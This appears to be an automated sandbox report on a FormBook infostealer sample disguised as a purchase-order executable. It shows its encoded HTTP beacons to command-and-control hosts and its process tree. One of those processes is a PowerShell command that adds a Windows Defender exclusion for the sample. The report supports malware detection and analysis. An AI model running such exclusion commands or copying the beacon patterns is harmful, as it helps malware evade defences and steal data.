                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              50192.168.2.84976584.32.84.32806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:19:09.721467018 CEST754OUTPOST /we8s/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.agilizeimob.app
                                                              Origin: http://www.agilizeimob.app
                                                              Referer: http://www.agilizeimob.app/we8s/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 4d 39 74 2f 6e 51 4d 50 65 2b 51 66 5a 62 32 43 41 70 5a 6c 56 6b 58 67 56 47 6d 68 66 4a 58 4c 2b 4c 39 31 48 52 78 46 78 79 38 71 7a 36 2b 68 32 4c 44 6e 62 34 35 34 48 64 74 4b 4a 37 6c 33 53 52 79 32 36 50 62 6c 48 53 65 78 4b 4b 57 79 66 38 72 34 36 76 47 66 76 76 63 76 6a 32 63 35 49 64 79 2f 37 56 44 57 61 53 2b 43 46 6a 34 37 56 4f 4b 6a 48 2f 38 38 70 46 58 4d 37 50 59 59 79 52 55 54 48 6b 77 71 78 41 79 4b 32 38 35 38 47 76 45 36 45 30 70 2b 4e 59 2f 49 68 6e 70 4a 63 39 4f 66 32 74 31 44 4d 56 30 52 31 45 37 37 57 6c 39 55 73 32 62 53 72 32 4d 4a 58 4b 50 39 2f 6c 47 62 51 77 6a 63 57 47 43 6b 79 43 39 61 48 46 68 71 37 44 6c 6a 35 34 6f 58
                                                              Data Ascii: Ux_TPFo=M9t/nQMPe+QfZb2CApZlVkXgVGmhfJXL+L91HRxFxy8qz6+h2LDnb454HdtKJ7l3SRy26PblHSexKKWyf8r46vGfvvcvj2c5Idy/7VDWaS+CFj47VOKjH/88pFXM7PYYyRUTHkwqxAyK2858GvE6E0p+NY/IhnpJc9Of2t1DMV0R1E77Wl9Us2bSr2MJXKP9/lGbQwjcWGCkyC9aHFhq7Dlj54oX


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              51192.168.2.84976684.32.84.32806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:19:12.262540102 CEST1771OUTPOST /we8s/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.agilizeimob.app
                                                              Origin: http://www.agilizeimob.app
                                                              Referer: http://www.agilizeimob.app/we8s/
                                                              Content-Length: 1244
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 4d 39 74 2f 6e 51 4d 50 65 2b 51 66 5a 62 32 43 41 70 5a 6c 56 6b 58 67 56 47 6d 68 66 4a 58 4c 2b 4c 39 31 48 52 78 46 78 79 30 71 7a 49 32 68 6b 63 33 6e 61 34 35 34 47 64 74 4c 4a 37 6c 71 53 51 61 79 36 50 58 71 48 58 43 78 4b 6f 75 79 57 75 44 34 30 76 47 66 6d 50 63 69 39 47 64 35 49 63 65 37 37 56 54 57 61 53 2b 43 46 6b 49 37 63 2f 4b 6a 46 2f 39 4f 35 56 58 51 2f 50 59 77 79 56 78 6b 48 6c 45 36 79 77 53 4b 32 63 70 38 4c 39 38 36 65 30 70 38 64 49 2f 41 68 6e 6c 67 63 39 54 75 32 73 42 70 4d 53 51 52 78 56 61 66 46 47 6c 76 31 6d 44 75 6b 55 4d 76 59 61 72 6a 33 45 79 4d 61 43 4b 2b 51 43 61 74 7a 7a 42 38 48 48 6f 63 76 32 56 56 72 66 56 69 61 77 48 71 2f 49 77 30 53 4e 4f 51 64 2f 54 54 77 2f 48 6c 39 69 56 6f 4a 4e 6d 47 64 31 75 44 32 42 52 74 79 6a 52 50 48 2f 59 41 59 37 79 34 44 34 51 47 48 44 70 74 42 43 70 47 47 6e 65 54 66 70 37 6a 75 72 2f 4e 74 72 50 79 54 4a 5a 69 58 66 66 4c 78 59 2f 70 34 4e 75 46 77 57 47 4f 78 59 6c 62 4b 58 5a 31 2f 36 4a 33 6c 4a [TRUNCATED]
                                                              Data Ascii: Ux_TPFo=M9t/nQMPe+QfZb2CApZlVkXgVGmhfJXL+L91HRxFxy0qzI2hkc3na454GdtLJ7lqSQay6PXqHXCxKouyWuD40vGfmPci9Gd5Ice77VTWaS+CFkI7c/KjF/9O5VXQ/PYwyVxkHlE6ywSK2cp8L986e0p8dI/Ahnlgc9Tu2sBpMSQRxVafFGlv1mDukUMvYarj3EyMaCK+QCatzzB8HHocv2VVrfViawHq/Iw0SNOQd/TTw/Hl9iVoJNmGd1uD2BRtyjRPH/YAY7y4D4QGHDptBCpGGneTfp7jur/NtrPyTJZiXffLxY/p4NuFwWGOxYlbKXZ1/6J3lJE9RVnNYfZbjP8gWqzyCo6uGvPcni+qUCJk969Ha/sV+x2xCtWlUTMNY3j4ybA5P3nrT6+o5GqC8UMpYMT4OUrCLPHAR9C6t+WdnNYVTfcP7IbFkAJjmh0DUD59/6FfrwxqAQZJzVNhnoYzp1OCUj/VLDsTqDS0mMQaRdhavJH6ERget4i5b/chE1pYKk3eBlpuiuiSiC2ElcvFOA8AMAvo3AsKmSY9+4o2Cs7JSH/FBvLcPRoJP4J5dV5tiVShCLxvsOcMS/WxTlEAffX9fV1nERpsOrWZruLzsSmgnbFjGbW3x4oCGzQXECppTWqhrbKLLuecSAyFGFzz5yOiMoqTRDYCZURJ1IsIWmoniQfNVVmi9+MEthrGSzDuMoMp5brvFhwbfoUz6ctLSDVOc/1azOV+kEg+T7ar1gDgON2gi2T5DxXMKAp4LjQu66Fo/mUR+bnEhwnfKWDqs+oAtYmkP+qOn39t20xlohXm90ghltuyWkTcClIcu96OzmE++ec1lLtoqlnAXuer3JBR+dp2d20uHyZyRIc7mAc3GV5wy215mbbXu8VWGZYDeFm/aMsL1qMub13gs2LFHgpmTF8ywnldHNZ7JMQ56PdLQ8NpRu2kvGRSXCYdi2t4YBURqO++cmr6SV+Nk3MDq3EBVbGkmkFKIlOwvXZp [TRUNCATED]


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              52192.168.2.84976784.32.84.32806192C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:19:14.806569099 CEST475OUTGET /we8s/?Ux_TPFo=B/Ffkm4qUuUCWdnVEpVwdmrdDijaPZ3A0fpocgttxQoV3YOc442YbZNzMMcWNYt4UT21tvDjHwm/MpeUUta83tC+u6YvkHEIW8iJ6mTYaCCmbzx0dOXTePBC5wD5mbl0jA==&FvypB=88kTDXb8k4dH HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Host: www.agilizeimob.app
                                                              Connection: close
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Sep 25, 2024 09:19:15.268935919 CEST1236INHTTP/1.1 200 OK
                                                              Server: hcdn
                                                              Date: Wed, 25 Sep 2024 07:19:15 GMT
                                                              Content-Type: text/html
                                                              Content-Length: 10072
                                                              Connection: close
                                                              Vary: Accept-Encoding
                                                              alt-svc: h3=":443"; ma=86400
                                                              x-hcdn-request-id: 27fa2d6bcda714c86b91b5c30ce88d06-bos-edge1
                                                              Expires: Wed, 25 Sep 2024 07:19:14 GMT
                                                              Cache-Control: no-cache
                                                              Accept-Ranges: bytes
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                              Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                              Sep 25, 2024 09:19:15.268954039 CEST224INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                              Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:3
                                                              Sep 25, 2024 09:19:15.268966913 CEST1236INData Raw: 30 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 21 69 6d 70 6f 72 74 61 6e 74 3b 63 6f 6c 6f 72 3a 23 33 33 33 7d 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 7d 68 33 7b 66 6f 6e 74
                                                              Data Ascii: 0px;font-weight:600!important;color:#333}h2{font-size:24px;font-weight:600}h3{font-size:22px;font-weight:600;line-height:28px}hr{margin-top:35px;margin-bottom:35px;border:0;border-top:1px solid #bfbebe}ul{list-style-type:none;margin:0;padding:
                                                              Sep 25, 2024 09:19:15.269047022 CEST1236INData Raw: 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 74 6f 70 2d 63 6f 6e 74 61 69 6e 65 72 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 7d 2e 6d 65 73 73 61 67 65 2d 73 75 62 74 69 74 6c 65 7b 63 6f 6c 6f
                                                              Data Ascii: align:center}.top-container{display:flex;flex-direction:row}.message-subtitle{color:#2f1c6a;font-weight:700;font-size:24px;line-height:32px;margin-bottom:16px}.message{width:60%;height:auto;padding:40px 0;align-items:baseline;border-radius:5px
                                                              Sep 25, 2024 09:19:15.269059896 CEST1236INData Raw: 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 61 64 64 69 6e 67 3a 34 70 78 20 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37
                                                              Data Ascii: -align:middle;text-align:center;display:inline-block;padding:4px 8px;font-weight:700;border-radius:4px;background-color:#fc5185}@media screen and (max-width:768px){.message{width:100%;padding:35px 0}.container{margin-top:30px}.navbar-links{dis
                                                              Sep 25, 2024 09:19:15.269078970 CEST672INData Raw: 66 6f 6c 6c 6f 77 3e 3c 69 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 74 72 75 65 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 67 72 61 64 75 61 74 69 6f 6e 2d 63 61 70 22 3e 3c 2f 69 3e 20 54 75 74 6f 72 69 61 6c 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c
                                                              Data Ascii: follow><i aria-hidden=true class="fas fa-graduation-cap"></i> Tutorials</a></li><li><a href=https://support.hostinger.com/en/ rel=nofollow><i aria-hidden=true class="fa-readme fab"></i>Knowledge base</a></li><li><a href=https://www.hostinger.c
                                                              Sep 25, 2024 09:19:15.269092083 CEST1236INData Raw: 77 69 74 68 20 48 6f 73 74 69 6e 67 65 72 21 3c 2f 64 69 76 3e 3c 70 3e 59 6f 75 72 20 64 6f 6d 61 69 6e 20 69 73 20 61 63 74 69 76 65 20 61 6e 64 20 69 73 20 75 73 69 6e 67 20 48 6f 73 74 69 6e 67 65 72 20 6e 61 6d 65 73 65 72 76 65 72 73 2e 20
                                                              Data Ascii: with Hostinger!</div><p>Your domain is active and is using Hostinger nameservers. Take the recommended steps below to continue your journey with Hostinger.</p></div><img src=https://cdn.hostinger.com/hostinger-academy/dns/domain-default-img.sv
                                                              Sep 25, 2024 09:19:15.269105911 CEST1236INData Raw: 6f 6c 75 6d 6e 2d 74 69 74 6c 65 3e 43 68 61 6e 67 65 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 65 72 76 65 72 73 3c 2f 64 69 76 3e 3c 62 72 3e 3c 70 3e 4d 61 6e 61 67 65 20 79 6f 75 72 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 65 72 76 65 72 73 20 69
                                                              Data Ascii: olumn-title>Change domain nameservers</div><br><p>Manage your domain nameservers in the domain management page of your Hostinger account.</p><br><a href=https://support.hostinger.com/en/articles/1696789-how-to-change-nameservers-at-hostinger r
                                                              Sep 25, 2024 09:19:15.269119024 CEST1236INData Raw: 29 29 3c 30 26 26 28 63 3d 30 29 2c 75 3d 30 3b 75 3c 63 3b 2b 2b 75 29 7b 69 66 28 74 26 26 28 79 5b 6d 2e 6c 65 6e 67 74 68 5d 3d 65 2e 63 68 61 72 43 6f 64 65 41 74 28 75 29 2d 36 35 3c 32 36 29 2c 31 32 38 3c 3d 65 2e 63 68 61 72 43 6f 64 65
                                                              Data Ascii: ))<0&&(c=0),u=0;u<c;++u){if(t&&(y[m.length]=e.charCodeAt(u)-65<26),128<=e.charCodeAt(u))throw new RangeError("Illegal input >= 0x80");m.push(e.charCodeAt(u))}for(d=0<c?c+1:0;d<E;){for(l=f,p=1,g=o;;g+=o){if(E<=d)throw RangeError("punycode_bad_i
                                                              Sep 25, 2024 09:19:15.269133091 CEST864INData Raw: 26 26 28 6c 3d 43 29 3b 69 66 28 6c 2d 68 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 28 69 2b 31 29 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72 66 6c 6f 77 20 28 31 29 22 29 3b 66
                                                              Data Ascii: &&(l=C);if(l-h>Math.floor((r-f)/(i+1)))throw RangeError("punycode_overflow (1)");for(f+=(l-h)*(i+1),h=l,d=0;d<v;++d){if((C=t[d])<h&&++f>r)return Error("punycode_overflow(2)");if(C==h){for(p=f,g=o;!(p<(s=g<=u?1:u+26<=g?26:g-u));g+=o)y.push(Stri


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              53192.168.2.849768188.114.96.380
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:19:28.994537115 CEST716OUTPOST /ttiz/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.cc101.pro
                                                              Origin: http://www.cc101.pro
                                                              Referer: http://www.cc101.pro/ttiz/
                                                              Content-Length: 208
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 30 48 63 75 70 47 31 4a 73 76 66 47 43 53 6f 78 6a 30 6c 5a 6c 49 2b 52 50 59 47 49 34 37 76 50 2b 6e 79 4f 53 4f 43 46 2f 5a 47 54 73 4d 64 33 67 67 70 5a 48 53 63 75 50 2b 56 70 71 57 73 36 54 72 2f 5a 59 56 77 4e 4f 6a 76 37 4a 6a 76 70 31 7a 6d 61 34 33 56 4d 6e 35 36 32 70 67 52 49 54 64 6f 43 48 72 58 64 50 47 72 63 2f 77 39 4c 63 6a 66 33 67 56 6f 58 57 55 65 77 66 53 72 56 74 70 49 64 49 71 37 35 75 42 42 78 7a 61 47 51 48 73 68 2b 61 64 4d 38 78 79 78 71 72 59 4f 4e 6d 67 32 6d 37 62 48 7a 45 71 43 63 4a 59 72 41 67 71 65 72 4e 6d 38 64 57 76 48 4c 58 2f 4f 51 2f 31 55 5a 69 52 4d 3d
                                                              Data Ascii: Ux_TPFo=0HcupG1JsvfGCSoxj0lZlI+RPYGI47vP+nyOSOCF/ZGTsMd3ggpZHScuP+VpqWs6Tr/ZYVwNOjv7Jjvp1zma43VMn562pgRITdoCHrXdPGrc/w9Lcjf3gVoXWUewfSrVtpIdIq75uBBxzaGQHsh+adM8xyxqrYONmg2m7bHzEqCcJYrAgqerNm8dWvHLX/OQ/1UZiRM=


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              54192.168.2.849769188.114.96.380
                                                              TimestampBytes transferredDirectionData
                                                              Sep 25, 2024 09:19:31.543590069 CEST736OUTPOST /ttiz/ HTTP/1.1
                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                              Accept-Language: en-us
                                                              Accept-Encoding: gzip, deflate, br
                                                              Host: www.cc101.pro
                                                              Origin: http://www.cc101.pro
                                                              Referer: http://www.cc101.pro/ttiz/
                                                              Content-Length: 228
                                                              Connection: close
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Cache-Control: no-cache
                                                              User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; N9515 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                                                              Data Raw: 55 78 5f 54 50 46 6f 3d 30 48 63 75 70 47 31 4a 73 76 66 47 43 7a 34 78 6d 54 52 5a 69 6f 2b 53 45 34 47 49 78 62 76 4c 2b 6e 2b 4f 53 50 48 49 38 72 69 54 72 74 74 33 6a 68 70 5a 41 53 63 75 48 65 55 6a 33 6d 73 78 54 72 7a 6e 59 56 4d 4e 4f 6a 37 37 4a 69 66 70 30 45 61 62 34 6e 56 4f 72 5a 36 30 74 67 52 49 54 64 6f 43 48 71 79 36 50 43 2f 63 2f 44 6c 4c 66 43 66 6f 2f 6c 6f 57 58 55 65 77 4f 69 72 52 74 70 4a 77 49 6f 4f 57 75 43 70 78 7a 66 69 51 48 35 56 39 51 64 4d 36 38 53 77 41 6a 38 58 6c 73 78 36 35 77 4b 72 53 4c 71 53 55 4d 75 47 71 36 49 57 74 4f 6d 55 32 57 73 76 39 53 49 54 34 6c 57 45 70 38 47 5a 4e 5a 66 4b 79 4c 52 45 49 75 67 58 65 2f 77 39 6b 33 2f 36 74
                                                              Data Ascii: Ux_TPFo=0HcupG1JsvfGCz4xmTRZio+SE4GIxbvL+n+OSPHI8riTrtt3jhpZAScuHeUj3msxTrznYVMNOj77Jifp0Eab4nVOrZ60tgRITdoCHqy6PC/c/DlLfCfo/loWXUewOirRtpJwIoOWuCpxzfiQH5V9QdM68SwAj8Xlsx65wKrSLqSUMuGq6IWtOmU2Wsv9SIT4lWEp8GZNZfKyLREIugXe/w9k3/6t
                                                              Sep 25, 2024 09:19:33.575815916 CEST694INHTTP/1.1 405 Not Allowed
                                                              Date: Wed, 25 Sep 2024 07:19:33 GMT
                                                              Content-Type: text/html
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sfT6KHekM8E8xQs9eJIhVEpKv9fsPsKyhKG1qUfusyg0%2BWYFCTes0DpVyOe4u4cE%2FdLTEx3KiaCwpmfC2V5uodZuiEvlHHproKHQLdLP4AqIn%2F3CP3JfWIS8UsjIs%2Bjr"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8c893f18af8bc47c-EWR
                                                              Data Raw: 39 35 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a 0a 0a 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                              Data Ascii: 95<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:03:15:17
                                                              Start date:25/09/2024
                                                              Path:C:\Users\user\Desktop\PO23100072.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\PO23100072.exe"
                                                              Imagebase:0x6f0000
                                                              File size:695'296 bytes
                                                              MD5 hash:B2A43D44C753D573CAEB9160CB1DA4A2
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:2
                                                              Start time:03:15:18
                                                              Start date:25/09/2024
                                                              Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO23100072.exe"
                                                              Imagebase:0xac0000
                                                              File size:433'152 bytes
                                                              MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:3
                                                              Start time:03:15:18
                                                              Start date:25/09/2024
                                                              Path:C:\Users\user\Desktop\PO23100072.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\PO23100072.exe"
                                                              Imagebase:0x90000
                                                              File size:695'296 bytes
                                                              MD5 hash:B2A43D44C753D573CAEB9160CB1DA4A2
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:4
                                                              Start time:03:15:18
                                                              Start date:25/09/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6ee680000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:5
                                                              Start time:03:15:18
                                                              Start date:25/09/2024
                                                              Path:C:\Users\user\Desktop\PO23100072.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Users\user\Desktop\PO23100072.exe"
                                                              Imagebase:0xd10000
                                                              File size:695'296 bytes
                                                              MD5 hash:B2A43D44C753D573CAEB9160CB1DA4A2
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1660826698.00000000016C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1660331680.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1665615488.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1665615488.00000000030B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:low
                                                              Has exited:true

                                                              General

                                                              Target ID:6
                                                              Start time:03:15:21
                                                              Start date:25/09/2024
                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                              Imagebase:0x7ff605670000
                                                              File size:496'640 bytes
                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                              Has elevated privileges:true
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:7
                                                              Start time:03:15:31
                                                              Start date:25/09/2024
                                                              Path:C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe
                                                              Wow64 process (32bit):true
                                                              Commandline:"C:\Program Files (x86)\VdZpyMJxbZNdrGYsWkJqGkeRokitNoAfhINYklHlKiYlSOZVppVayzKSXckAAZaETXWyNG\FrMKpuEiehQ.exe"
                                                              Imagebase:0x120000
                                                              File size:140'800 bytes
                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                              Has elevated privileges:false
                                                              Has administrator privileges:false
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3906324817.0000000004410000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3906324817.0000000004410000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                              Reputation:high
                                                              Has exited:false

                                                              General

